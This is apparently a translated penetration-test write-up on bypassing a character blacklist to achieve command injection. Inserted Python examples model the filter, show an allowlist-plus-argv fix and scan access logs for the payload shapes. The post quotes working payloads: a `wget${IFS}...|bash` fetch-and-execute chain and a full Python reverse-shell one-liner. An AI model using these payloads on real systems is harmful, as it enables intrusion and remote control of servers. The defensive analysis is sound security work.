This afternoon, while slacking off during a company test, I was searching the responses for keywords when an error message caught my attention:

whoami? So let's test with dnslog:

Looks like the filter replaces a lot of special characters: `.` `(` `)` `&` `:` `/` [space] `=`. The IP is converted to a number, and here is a test against a service on my own server:

In Linux, ${IFS} can replace a space. $9 bypass: $9 is the ninth positional argument of the current shell process, which is always an empty string, so it can also serve as an empty-string separator to split a word.

2. Redirection character

Constructing the payload: note that `||` goes before and `;` after, to close off the surrounding command on each side: `111||wget${IFS}3162736550;`
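The ${IFS} and $9 tricks and the `||` / `;` framing work because the application filters characters instead of keeping user input out of the shell altogether. The following Python example is added here and is not the post's code: it models the blacklist filter the post describes, approximates what the shell expands those tokens to, and contrasts that with an allowlist check plus an argv-style invocation. The exact character set, the hypothetical `ping` feature and the sample inputs are assumptions.

```python
import ipaddress
import re
import subprocess

# Assumption: the vulnerable app strips this set of characters from user input
# before building a shell command (modelled on the filter the post describes).
BLACKLISTED_CHARS = set(".()&:/ =")


def blacklist_filter(user_input: str) -> str:
    """Weak defence: drop blacklisted characters and hope the rest is harmless."""
    return "".join(ch for ch in user_input if ch not in BLACKLISTED_CHARS)


def vulnerable_command(user_input: str) -> str:
    """How the vulnerable app would build its shell string (returned, never run)."""
    return "ping -c 1 " + blacklist_filter(user_input)


def simulate_shell_expansion(command: str) -> str:
    """Approximate the two expansions the post relies on, so the reader can see
    what bash would actually execute:
      ${IFS} -> the default field separator; a single space is enough for
                word splitting to take place
      $9     -> empty, because the shell has no ninth positional parameter
    """
    return command.replace("${IFS}", " ").replace("$9", "")


# Allowlist: a DNS hostname (labels of letters, digits and hyphens, no leading
# or trailing hyphen), at most 253 characters in total.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def validate_host(user_input: str) -> str:
    """Allowlist validation: return a canonical host or raise ValueError.

    An all-digit token is treated as a decimal IPv4 literal (the dot-free form
    used in the post) and canonicalised to dotted notation, so logs and any
    later egress checks see the real address instead of an opaque number.
    """
    if user_input.isdigit():
        n = int(user_input)
        if n > 0xFFFFFFFF:
            raise ValueError(f"rejected host argument: {user_input!r}")
        return str(ipaddress.ip_address(n))
    try:
        return str(ipaddress.ip_address(user_input))
    except ValueError:
        pass
    if HOSTNAME_RE.match(user_input):
        return user_input
    raise ValueError(f"rejected host argument: {user_input!r}")


def build_ping_argv(user_input: str) -> list:
    """Hardened form: the validated value is one argv element; no shell parses it."""
    return ["ping", "-c", "1", validate_host(user_input)]


def run_ping(user_input: str) -> int:
    """Execute with shell=False: ${IFS}, $9 and || are now just bytes in an argument."""
    return subprocess.run(build_ping_argv(user_input), shell=False, check=False).returncode


if __name__ == "__main__":
    payload = "111||wget${IFS}3162736550;"  # the post's probe, used as constructed input
    print("after blacklist:", vulnerable_command(payload))
    print("shell would run:", simulate_shell_expansion(vulnerable_command(payload)))
    print("allowlist:", build_ping_argv("192.168.99.242"))
    try:
        build_ping_argv(payload)
    except ValueError as err:
        print("allowlist:", err)
```

Run it as-is to see the three outcomes side by side: the probe passes the blacklist untouched, the simulated expansion shows the space reappearing, and the allowlist rejects it while canonicalising `3162736550` to `188.131.135.166`. The fix that matters is the argv list with `shell=False`; the allowlist is there so that a bad value fails loudly instead of reaching the binary at all.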

Looks like it works. Let's just play with it. Encoding (base64 or hex) gets the reverse shell past the special-character filter:

That exceeds the length limit the detection enforces. Instead, use wget to fetch the payload directly and execute it. This took a lot of time (or I'm just too much of a noob). The wget form is `wget -q -O - xxx.com`, so the payload becomes: `11||wget${IFS}-q${IFS}-O${IFS}-${IFS}XXXXXXXXX|bash`. The request showed up in the log, but the listener got no connection back. Bash failed to execute, so try again in another language (Python).
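From the defender's side, the fetch-and-execute shape (`wget -q -O - ... | bash`), the ${IFS} padding and the decimal IP all leave a distinctive trace in the web server's access log, which is exactly where the request above was seen. The following Python example is added here and is not the post's code: it decodes the query parameters from constructed Apache-style log lines and flags those indicators. The log lines, the parameter name `q` and the indicator list are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (Apache-style), not taken from the post.
# Line 1 is ordinary traffic; lines 2 and 3 carry the ||, ${IFS}, wget and
# "| bash" shapes described in the post; line 4 is a bare recon probe.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=router HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=111%7C%7Cwget%24%7BIFS%7D3162736550%3B HTTP/1.1" 500 88',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=11%7C%7Cwget%24%7BIFS%7D-q%24%7BIFS%7D-O%24%7BIFS%7D-%24%7BIFS%7D3162736550%7Cbash HTTP/1.1" 500 88',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=whoami%24%7BIFS%7D HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)')

# Indicator name -> pattern applied to each decoded parameter value.
INDICATORS = [
    ("ifs_expansion", re.compile(r"\$\{?IFS\}?")),                  # ${IFS} / $IFS standing in for a space
    ("positional_param", re.compile(r"\$[0-9]")),                   # $9-style empty expansion splitting a word
    ("command_chain", re.compile(r"\|\||&&|;")),                    # ||, && or ; joining commands
    ("download_tool", re.compile(r"\b(?:wget|curl)\b")),
    ("pipe_to_shell", re.compile(r"\|\s*(?:ba|z|da)?sh\b")),        # ... | bash
    ("inline_interpreter", re.compile(r"\b(?:python[23]?|perl|php)\s+-c\b")),
    ("recon_command", re.compile(r"\b(?:whoami|uname)\b")),
]


def decimal_ip_literals(value: str) -> list:
    """All-digit tokens that fit a 32-bit address: the dot-free decimal-IP form."""
    return [tok for tok in re.findall(r"(?<!\d)\d{8,10}(?!\d)", value) if int(tok) <= 0xFFFFFFFF]


def classify_value(value: str) -> list:
    """Names of every indicator present in one decoded parameter value."""
    found = [name for name, rx in INDICATORS if rx.search(value)]
    if decimal_ip_literals(value):
        found.append("decimal_ip")
    return found


def parameter_values(target: str) -> list:
    """Decode the query string by hand (split on & only, so a literal ; survives)."""
    values = []
    for pair in urlsplit(target).query.split("&"):
        if pair:
            _, _, raw = pair.partition("=")
            values.append(unquote_plus(raw))
    return values


def scan_log(lines) -> list:
    """Return one hit per log line whose parameters carry at least one indicator."""
    hits = []
    for number, line in enumerate(lines, start=1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        indicators = []
        for value in parameter_values(m.group("target")):
            for name in classify_value(value):
                if name not in indicators:
                    indicators.append(name)
        if indicators:
            hits.append({"line": number, "client": m.group("client"), "indicators": indicators})
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit)
```

Two design points. The query string is split on `&` only, because older `parse_qs` versions also split on `;` and would silently drop the trailing `;` that the post's payloads carry. And the generic expansion indicators (`ifs_expansion`, `positional_param`) are deliberately separate from the keyword ones: a value such as `who$9ami` contains no `whoami` substring, so keyword matching alone misses it, while the `$9` shape itself is still caught.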

python -c "import os,socket,subprocess; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(('192.168.99.242',1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(['/bin/bash','-i']);"

This time there is a connection back, but it exits with an error:

Change /bin/bash to /bin/sh.

Reflection:

1. Searching the responses for fingerprint keywords quickly locates the corresponding problems, such as SQL statement errors, code-execution error messages and so on.
2. Why were the connectors between commands not filtered?
3. I'm a real noob.
4. Don't want to stay a noob: read more books, read the experts' writeups, and freeload the public material. [haha, I'm a handsome little rascal]